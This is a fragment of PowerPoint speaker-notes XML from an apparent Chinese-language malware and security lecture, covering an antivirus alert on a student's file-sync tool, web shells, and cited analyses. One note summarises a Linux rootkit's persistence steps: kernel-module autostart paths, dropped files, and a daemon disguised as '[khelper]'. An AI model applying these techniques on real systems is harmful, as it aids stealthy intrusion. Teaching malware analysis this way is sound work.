              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>学生用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写的一个文件同步的小程序。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中，更新按钮的功能是：将源目录下的所有文件（含子目录）拷贝到目的目录下，如果相同则覆盖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选择好源目录和目的目录后，点击“更新”，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>弹出告警。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>告警的可能原因是：批量目录操作，比较像勒索病毒，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>觉得这个自制程序比较可疑，也没报家族，交由用户判断</a:t>
            </a:r>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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370727849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98D00620-6178-46C5-8F20-2517766D17DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151555" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15155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zh-CN"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与江湖女中豪杰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wollf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结为连理</a:t>
            </a:r>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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26828759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https://malwr-analysis.com/2020/07/24/crimson-rat-malware-analysis/</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172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16973842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https://www.secrss.com/articles/27850</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188</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15911782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https://security.tencent.com/index.php/blog/msg/180</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189</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23213039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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1179893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https://www.secrss.com/articles/29283</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目前，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>在网络攻击中扮演着至关重要的角色，它为攻击者提供了一种方法来控制被入侵的服务器，然后编排对目标内部网络的控制。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>2020</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>月，美国国家安全局发布了一份包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>个常用漏洞的报告，其中就包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。该报告不仅警告了这些漏洞被用于面向公众的系统，还警告了其在企业内网中的使用。</a:t>
            </a:r>
          </a:p>
          <a:p>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3042765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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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191</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12787132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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24833809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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41105458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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34379598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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24822095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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124697572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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>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197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322063708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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>创建内核模块自启动</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/modules/ati_remote3.modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>写入内核模块文件</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/lib/modules/%s/kernel/drivers/input/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/ati_remote3.ko</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>释放</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rmgr_fake_libc.so</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件到磁盘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>释放</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rmgr_daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件到磁盘，并以“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>khelper</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>]”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进程名通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>call_usermodehelper_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>运行它。</a:t>
            </a:r>
          </a:p>
          <a:p>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198</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423316810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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18734809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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3859880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如果木马代码是插入到其它文件中，就是无文件木马</a:t>
            </a:r>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34955930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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379193718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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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202</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183385852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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164686961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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6734919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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174165736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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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206</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214552966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https://security.tencent.com/index.php/blog/msg/180</a:t>
            </a:r>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207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
